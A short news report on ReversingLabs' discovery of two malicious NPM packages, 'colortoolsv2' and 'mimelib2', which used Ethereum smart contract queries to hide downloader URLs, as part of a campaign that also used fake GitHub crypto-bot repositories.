Cybersecurity experts have identified a sophisticated method employed by hackers to deliver malware through the use of compromised NPM packages, which harness blockchain queries to disguise malicious URLs as part of legitimate traffic. The discovery, made by ReversingLabs, focuses on two specific NPM packages—‘colortoolsv2’ and ‘mimelib2’—that were uploaded to the widely used Node Package Manager repository in July.
These packages exploit the capabilities of Ethereum smart contracts to fetch URLs leading to downloader malware. By embedding command and control addresses within the blockchain traffic, attackers successfully circumvent traditional security scans, making their malicious activities appear as benign transactions.
This development is part of a larger deception campaign. The attackers have created fake GitHub repositories that masquerade as cryptocurrency trading bots, complete with counterfeit commits, fabricated user accounts, and professional-looking documentation. This strategy is designed to lure unsuspecting developers into using their compromised software.
The trend is a concerning one, as experts have noted that similar campaigns have extended to include targets within Solana and Bitcoin-related libraries, indicating a broader evolution in cyber threats. The implications of these findings raise important questions regarding the security of software development ecosystems and the need for vigilant practices among developers.
